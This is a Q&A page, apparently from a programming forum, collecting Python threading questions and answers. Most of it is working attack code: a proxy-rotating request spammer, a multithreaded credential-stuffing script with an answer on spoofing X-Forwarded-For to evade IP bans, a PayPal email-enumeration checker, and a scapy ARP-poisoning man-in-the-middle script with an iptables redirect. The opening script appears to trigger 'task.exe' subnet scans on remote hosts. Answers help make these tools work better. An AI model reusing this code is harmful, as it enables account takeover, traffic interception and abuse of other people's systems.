I am trying to increment start_ip and end_ip by 1 on each iteration. However, whenever the function falls into the else branch ('already active'), the counter keeps advancing. Is there a way to keep number1 from advancing in the for loop when it hits an IP that is already active? I tried decrementing it by one and adding a break, but that does not seem to work.
#!/usr/bin/env python3
import requests
import time
import re
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',
    'Accept-Encoding': 'gzip, deflate',
    'Upgrade-Insecure-Requests': '1',
    'Accept-Language': 'en-US,en;q=0.5'
}
def log(ip):
    log = open("ip_active.txt", "a+")
    log.write(ip)
    log.close()

def start_ip():
    x = 0
    while x == 0:
        for number1 in range(1, 254):
            start_ip = '192.168.' + str(number1) + '.1'
            end_ip = '192.168.' + str(number1) + '.254'
            with open('ip_list.txt', 'r') as iplist:
                for ip in iplist:
                    with open('ip_active.txt', 'r') as ipactive:
                        try:
                            if ip not in ipactive:
                                log(ip)
                                print('Running task: ' + ip + f'task.exe%20{start_ip}%20{end_ip}')
                                target = ip.strip() + f'task.exe%20{start_ip}%20{end_ip}'
                                r = requests.get(target, allow_redirects=True, verify=False, headers=headers, timeout=1)
                            else:
                                # Here number1 keeps incrementing as well but should not.
                                print(f'ip {ip} already active')
                                time.sleep(2)
                        except:
                            print('Timeout')
                            continue

def main():
    start_ip()

if __name__ == "__main__":
    main()
Output:
ip http://172.16.86.153 already active
ip http://172.16.86.152 already active
Running task: http://172.16.86.153/?747fb083889d4d3591b8e185032f958c= task.exe%20192.168.**1**.1%20192.168.**1**.254
Running task: http://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**2**.1%20192.168.**2**.254
ip http://172.16.86.153 already active
ip http://172.16.86.152 already active
It should continue with:
Running task: http://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**3**.1%20192.168.**3**.254
Running task: http://172.16.86.153/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**4**.1%20192.168.**4**.254
but instead it results in, for example:
Running task: http://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**120**.1%20192.168.**120**.254
Running task: http://172.16.86.153/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**121**.1%20192.168.**121**.254
As can be seen, when an IP is available it runs the task with, for example, 192.168.12.1 192.168.12.254, then for the next IP 192.168.13.1 192.168.13.254, then 192.168.14.1 192.168.14.254, and so on. However, when an IP is already active the counter keeps advancing, so those subnets are skipped for the Running tasks.
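One way to get the behaviour you describe is to take the counter out of the for loop entirely and advance it only when a task is actually launched. Below is a minimal, untested sketch of that idea, reusing your log(), headers and file names; itertools.count stands in for range, so you would still need to cap it at 254 if that matters:

import itertools

def start_ip():
    # subnet_counter only advances when a task is launched,
    # not on every pass through the loop.
    subnet_counter = itertools.count(1)
    while True:
        with open('ip_list.txt', 'r') as iplist:
            for ip in iplist:
                with open('ip_active.txt', 'r') as ipactive:
                    if ip in ipactive:
                        print(f'ip {ip} already active')
                        time.sleep(2)
                        continue
                number1 = next(subnet_counter)  # advances only here
                start_ip = f'192.168.{number1}.1'
                end_ip = f'192.168.{number1}.254'
                log(ip)
                target = ip.strip() + f'task.exe%20{start_ip}%20{end_ip}'
                print('Running task: ' + target)
                try:
                    requests.get(target, allow_redirects=True, verify=False,
                                 headers=headers, timeout=1)
                except requests.RequestException:
                    print('Timeout')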
Related
I am working on a simple web scraper and am currently trying to implement some multithreading. While my code works as intended with some servers (reducing the time of execution vastly), my primary goal is to make it work with a few specific ones. When I try it with the ones in the sites list, I get performance as if I were still using sequential code. Any guesses what can cause this?
import requests, time
from bs4 import BeautifulSoup
from threading import Thread
from random import choice

# Enable to get some logging info
# ---------------------------------
# import logging
# import http.client
# http.client.HTTPConnection.debuglevel = 1
# logging.basicConfig()
# logging.getLogger().setLevel(logging.DEBUG)
# requests_log = logging.getLogger("requests.packages.urllib3")
# requests_log.setLevel(logging.DEBUG)
# requests_log.propagate = True

sites = [
    "https://pikabu.ru/community/blackhumour",
    "https://www.pikabu.ru/tag/%D0%9C%D0%B5%D0%BC%D1%8B/hot"
]

class Pikabu_Downloader(Thread):
    def __init__(self, url, name, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.url = url
        self.name = name
        self.begin = time.time()

    def run(self):
        print("Beginning with thread number", self.name, ",", round(time.time() - self.begin, 4), " seconds has passed")
        html_data = self._get_html()
        print("After requests.get with thread number", self.name, ",", round(time.time() - self.begin, 4), " seconds has passed")
        if html_data is None:
            return
        self.soup = BeautifulSoup(html_data, "html.parser")
        print("After making soup with thread number", self.name, ",", round(time.time() - self.begin, 4), " seconds has passed")

    def _get_html(self):
        try:
            user_agents = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'AppleWebKit/537.36 (KHTML, like Gecko)', 'Chrome/74.0.3729.169', 'Safari/537.36')
            print(f"Go {self.url}...")
            res = requests.get(self.url, headers={'User-Agent': choice(user_agents)}, stream=True)  # , allow_redirects=False)
        except Exception as exc:
            print(exc)
        else:
            return res.text

test = "https://readingbooks.site/read/?name=1984&"

def download():
    pikabu_urls = []
    for url in sites:
        pikabu = [url + "?page=" + str(x) for x in range(1, 10)]
        pikabu_urls = pikabu_urls + pikabu
    pikabu_dls = [Pikabu_Downloader(url=page, name=str(i)) for i, page in enumerate(pikabu_urls)]
    # Comment the line above and enable the 2 lines below to get results from the test server
    # tests = [test + "page=" + str(x) for x in range(1, pages)]
    # pikabu_dls = [Pikabu_Downloader(url=page, name=str(i)) for i, page in enumerate(tests)]
    for pikabu_dl in pikabu_dls:
        pikabu_dl.start()
    for pikabu_dl in pikabu_dls:
        pikabu_dl.join()

download()
And the result is something like
...
After requests.get with thread number 1 , 1.6904 seconds has passed
After making soup with thread number 1 , 1.7554 seconds has passed
After requests.get with thread number 2 , 2.9805 seconds has passed
After making soup with thread number 2 , 3.0455 seconds has passed
After requests.get with thread number 3 , 4.3225 seconds has passed
After making soup with thread number 3 , 4.3895 seconds has passed
...
What can cause such latency between thread executions? I was hoping each thread would finish almost simultaneously and give more asynchronous output, like with the test server. If I set a timeout of 5 seconds inside requests.get, most of the requests won't even work.
After investigating your case, I would point out some issues you have encountered:
Do not print inside parallel tasks; rendering to the screen becomes a bottleneck.
A large number of tasks is not always good for performance; it depends on how much your memory can handle. If you have 1000 links, do you really need to create 1000 task objects? No, keep a pool of only 5-20 workers by leveraging a ThreadPool.
The server is also a factor: download size, low bandwidth, network conditions and distance all delay the response, and that affects your machine. Your sites are heavy; each request seems to take 1-3000 ms, so when you test with a small batch (20 links) it feels as if it runs sequentially.
Your code does run in parallel, since you put the work on different threads, but it is not quite right, because for this you really want a fully async library such as asyncio and aiohttp. aiohttp handles the numerous async requests via coroutines, while asyncio supplies the syntax and runs them on your main thread.
I did a small experiment on Colab. Please note that I didn't use asyncio and aiohttp on Colab because it got stuck there, but I have used them in several projects before and they were faster than the fastest method below.
The second function is your implementation.
import urllib.request
import concurrent.futures
from threading import Thread
import time, requests
from random import choice

user_agents = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'AppleWebKit/537.36 (KHTML, like Gecko)', 'Chrome/74.0.3729.169', 'Safari/537.36')
timeout = 5
sites = [
    "https://pikabu.ru/community/blackhumour",
    "https://www.pikabu.ru/tag/%D0%9C%D0%B5%D0%BC%D1%8B/hot"
]
URLS = []
for url in sites:
    pikabu = [url + "?page=" + str(x) for x in range(25)]
    URLS.extend(pikabu)

def convert_to_threads():
    return [Thread(target=load_url, args=(page, timeout)) for page in URLS]

def running_threads():
    threads = convert_to_threads()
    start = time.time()
    for i in threads:
        i.start()
    for i in threads:
        i.join()
    print(f'Finish with {len(URLS)} requests {time.time() - start}')

def load_url(url, timeout):
    res = requests.get(url, headers={'User-Agent': choice(user_agents)}, stream=True)  # , allow_redirects=False)
    return res.text

def running_sequence():
    start = time.time()
    for url in URLS:
        load_url(url, timeout)
    print(f'Finish with {len(URLS)} requests {time.time() - start}')

def running_thread_pool():
    start = time.time()
    # We can use a with statement to ensure threads are cleaned up promptly
    with concurrent.futures.ThreadPoolExecutor(max_workers=15) as executor:
        # Start the load operations and mark each future with its URL
        future_to_url = {executor.submit(load_url, url, timeout): url for url in URLS}
        for future in concurrent.futures.as_completed(future_to_url):
            url = future_to_url[future]
            try:
                data = future.result()
            except Exception as exc:
                print('%r generated an exception: %s' % (url, exc))
            # else:
            #     print('%r page is %d length' % (url, len(data)))
    print(f'Finish with {len(URLS)} requests {time.time() - start}')
In short, I recommend you use a ThreadPool (preferred in Colab), or asyncio and aiohttp (not in Colab), to gain speed.
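For completeness, here is a rough sketch of the asyncio/aiohttp approach mentioned above (not something I ran on Colab; it assumes the same URLS and user_agents from the snippet above and that aiohttp is installed):

import asyncio
import aiohttp

async def fetch(session, url):
    # One coroutine per URL; the event loop interleaves the waits on network I/O.
    async with session.get(url, headers={'User-Agent': choice(user_agents)}) as resp:
        return await resp.text()

async def run_all(urls):
    async with aiohttp.ClientSession() as session:
        return await asyncio.gather(*(fetch(session, u) for u in urls))

# pages = asyncio.run(run_all(URLS))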
I have a little Python script for spamming requests to a URL using Requests. It uses proxies so the IPs are random; I have a text file called https.txt that has over two thousand proxies that I've gathered.
I attempted to multithread the program, but I feel like what I'm doing isn't exactly ideal for the task. If I could get any advice on how to improve this, that would be much appreciated.
from colorama import Fore, Back, Style, init
import requests
import threading

init()

# constant vars
link = ""  # URL goes here
agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
referer = ""
proxies = open("https.txt", "r")

# dynamic vars
threadLock = threading.Lock()
threads = []
num = 0

class myThread (threading.Thread):
    def __init__(self, threadID, name, counter, proxy):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.counter = counter
        self.proxy = proxy

    def run(self):
        # print("Starting " + self.name)
        spam(self.name, proxy)

# Each thread runs this function once
def spam(threadName, proxy):
    try:
        headers = {
            "user-agent": agent,
            "referer": referer
        }
        req = requests.get(url=link, headers=headers, proxies=proxy, timeout=100)
        status = req.status_code
        req.close()
        if status == 200:
            print(Fore.CYAN + threadName + ": Working request with proxy: " + Fore.YELLOW + x.strip())
        else:
            print(Fore.GREEN + threadName + ": Connection Code Status Error:", status)
    except IOError:
        print(Fore.RED + threadName + ": Connection error - Bad Proxy")

for x in proxies:
    thread = str(num)
    num = num + 1
    proxy = {
        "https": x.strip()
    }
    thread = myThread(thread, "Thread-" + thread, num, proxy)
    thread.start()

# Wait for all threads to complete
for t in threads:
    t.join()
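For reference, one common way to tighten this kind of script up (in the spirit of the ThreadPool advice elsewhere on this page) is to hand the proxy list to a bounded concurrent.futures.ThreadPoolExecutor instead of spawning one Thread subclass per proxy. A rough, untested sketch, reusing the same link, agent, referer and https.txt names from the script above:

import concurrent.futures
import requests

def spam(proxy_line):
    # Return the proxy and the status code it produced, or None on a connection error.
    proxy = {"https": proxy_line.strip()}
    headers = {"user-agent": agent, "referer": referer}
    try:
        req = requests.get(link, headers=headers, proxies=proxy, timeout=10)
        return proxy_line.strip(), req.status_code
    except requests.RequestException:
        return proxy_line.strip(), None

with open("https.txt") as f:
    proxy_lines = [line for line in f if line.strip()]

# 50 workers is an arbitrary cap; tune it rather than starting 2000+ threads.
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
    for proxy_line, status in executor.map(spam, proxy_lines):
        if status == 200:
            print("Working proxy:", proxy_line)
        elif status is None:
            print("Bad proxy:", proxy_line)
        else:
            print("Status", status, "from", proxy_line)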
As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from math import ceil
from time import sleep

global proxy_queue
global user_queue
global hits
global stats
global start_time

def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }

def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':')
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1
        if status == 0:
            stats['fake'] += 1
        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1
        if status == -2:
            stats['Exception'] += 1
        user_queue.task_done()

def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)
        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
            'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }
        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2

def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))

def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),

if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time
    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    hit_printer = Thread(target=hit_printer)
    hit_printer.daemon = True
    hit_printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
    except Exception as e:
        print e
So it is expected to make many requests to the website through multiple threads, but it doesn't work as expected. After a few requests the proxies get banned and it stops working. Since I'm disposing of each proxy after I use it, that shouldn't be the case. So I believe it might be due to one of the following:
In an attempt to make multiple requests using multiple sessions, it is somehow failing to keep the sessions separate because it does not support asynchronicity.
The victim site bans IPs by group, e.g. banning all IPs starting with 132.x.x.x after receiving multiple requests from any of the 132.x.x.x IPs.
The victim site is using headers like 'X-Forwarded-For', 'Client-IP', 'Via', or a similar header to detect the originating IP. But that seems unlikely, because I can log in via my browser without any proxy and it doesn't throw any error, which suggests my IP isn't exposed in any sense.
I am unsure whether I'm making an error in the threading part or the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a life saver.
I was using elite-level proxies and there was no way the victim site could have found my IP address; however, it was using X-Forwarded-For to detect my real IP address.
Since elite-level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was via the latest address in X-Forwarded-For. The solution is to set the X-Forwarded-For header to a random IP address every time a request is made, which successfully spoofs the victim site into believing the request is legitimate.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
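In context, that looks roughly like the sketch below (illustrative only, wrapping the one-liner in a helper for the get_status() function above; random would need to be imported at the top of the script):

import random

def random_forwarded_for():
    # Build a random dotted-quad to put in X-Forwarded-For for each request.
    return '.'.join(str(random.randint(0, 255)) for _ in range(4))

# inside get_status(), instead of the hard-coded '8.8.8.8':
# header['X-Forwarded-For'] = random_forwarded_for()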
I'm checking my customers' countries so that I know which service I can offer them, and so on.
The problem is that the threads block: for example, it checks 15-20 emails and then stops. I want a solution to keep it going.
The code is:
import requests
import re
from sys import argv
from Queue import Queue
from threading import Thread

e = argv[1]
emails = open(e, 'r').readlines()
emails = map(lambda s: s.strip(), emails)
valid = []

def base(email):
    xo = requests.get("http://www.paypal.com/xclick/business=" + email, headers={"User-Agent": "Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0"}).text
    x = re.search("s.eVar36=\"(.*?)\";", xo)
    try:
        if x.group(1) != "":
            print "%s === %s" % (email, x.group(1))
            w = open(str(x.group(1)) + ".txt", 'a')
            w.write(email + "\n")
            valid.append(email)
    except:
        pass

def work():
    email = q.get()
    base(email)
    q.task_done()

THREADS = 25
q = Queue()
for i in range(THREADS):
    t = Thread(target=work())
    t.daemon = True
    t.start()

if (len(argv) > 0):
    for email in emails:
        q.put(email)
q.join()
Thanks in advance.
Your problem is that you call work() instead of passing the work function when creating your threads. Rather than patching your code, consider moving to Python's ThreadPool, which does the heavy lifting for you. Here's an example that implements what you want.
map calls your worker for each email in the iterable and returns the worker's results as an iterator (Python 3) or list (Python 2). Your worker returns a valid email or None for each email it's given, so you just have to filter out the Nones at the end.
import requests
import re
from sys import argv
import multiprocessing.pool

e = argv[1]
emails = [line.strip() for line in open(e)]

def base(email):
    print("getting email {}".format(email))
    try:
        xo = requests.get("http://www.paypal.com/xclick/business=" + email, headers={"User-Agent": "Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0"}).text
        x = re.search("s.eVar36=\"(.*?)\";", xo)
        try:
            if x.group(1) != "":
                print("{} === {}".format(email, x.group(1)))
                with open(str(x.group(1)) + ".txt", 'a') as w:
                    w.write(email + "\n")
                return email
        except:
            pass
    except requests.exceptions.RequestException as e:
        print(e)

THREADS = 25
pool = multiprocessing.pool.ThreadPool(THREADS)
valid = [email for email in pool.map(base, emails, chunksize=1) if email]
print(valid)
pool.close()
A short explanation of what I am trying to do :)
I want to replace every picture within the HTTP traffic with a specific one.
I start with ARP spoofing to get into the traffic. Then I check whether the packet contains raw HTTP data. If it does, I check whether the request is an image request. If it is, I try to replace that request with my own.
Here is my code:
#!/usr/bin/python
from scapy.all import *
import threading
import os
import re
import sys

# Destination is the IP address of the victim
# Source is the IP address of the gateway
# Opcode is Reply (2)
def VictimPoisoning():
    VictimPacket = ARP(pdst=VictimIP, psrc=GatewayIP, op=2)
    while True:
        try:
            send(VictimPacket, verbose=0)
        except KeyboardInterrupt:
            sys.exit(1)

# Source is the IP address of the gateway
# Destination is the IP address of the victim
# Opcode is Reply (2)
def GatewayPoisoning():
    GatewayPacket = ARP(pdst=GatewayIP, psrc=VictimIP, op=2)
    while True:
        try:
            send(GatewayPacket, verbose=0)
        except KeyboardInterrupt:
            sys.exit(1)

def TCPHttpExtract(pkt):
    if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.getlayer(Raw):
        # This packet should be sent for every image request
        OwnPacket = "GET /resources/css/mdr/global/img/iconFlash.jpg HTTP/1.1\nHost: www.site.com\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nConnection: keep-alive"
        StringJPG = ""
        StringPNG = ""
        StringGIF = ""
        StringPacket = ""
        liste = []
        for line in pkt.getlayer(Raw):
            liste.append(line)
        # Check if the request contains a *.jpg, *.png, *.gif
        # Just check JPG - the rest will be implemented later on
        StringPacket = re.findall('(\s\/.*?\s)', str(liste))
        StringJPG = re.findall('.*\.jpg', str(StringPacket))
        StringPNG = re.findall('.*\.png', str(StringPacket))
        StringGIF = re.findall('.*\.gif', str(StringPacket))
        if (StringJPG):
            send(OwnPacket)

# Forward packets
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')

print "\n----------------------------------------"
VictimIP = raw_input("Victim-IP: ")
GatewayIP = raw_input("Gateway-IP: ")
IFACE = raw_input("Interface: ")
print "-----------------------------------------\n"

VictimThread = []
GatewayThread = []

print "Start poisoning the Victim ... \n"
while True:
    try:
        # VictimThread
        VicPoison = threading.Thread(target=VictimPoisoning)
        VicPoison.setDaemon(True)
        VictimThread.append(VicPoison)
        VicPoison.start()

        # GatewayThread
        GWayPoison = threading.Thread(target=GatewayPoisoning)
        GWayPoison.setDaemon(True)
        GatewayThread.append(GWayPoison)
        GWayPoison.start()

        pkt = sniff(iface=IFACE, prn=TCPHttpExtract)
    # Cancel with CTRL+C
    except KeyboardInterrupt:
        sys.exit(1)
The ARP spoofing is working, and so are the image regex and the sending of the packet, but the browser won't change/get this image. Do I have to destroy the original packet first? I don't want to use ettercap; I want to do it with Python here :)
Sorry for the bad formatting.
Thanks to you all for your help! :)
The answer to this question is proxpy in combination with iptables.
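To sketch how those two pieces fit together: keep the ARP spoofing as above, then redirect the victim's HTTP traffic into a local proxy (proxpy) that rewrites the image responses, instead of injecting raw packets with scapy. The redirection part could look roughly like this, run on the attacking machine; port 8080 is only an assumed example for wherever the proxy is listening:

import os

# Keep forwarding enabled so the victim's traffic still flows through this host.
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')

# Redirect HTTP (port 80) traffic passing through this host to the local
# proxy port; 8080 is a placeholder for the port proxpy is configured to use.
os.system('iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080')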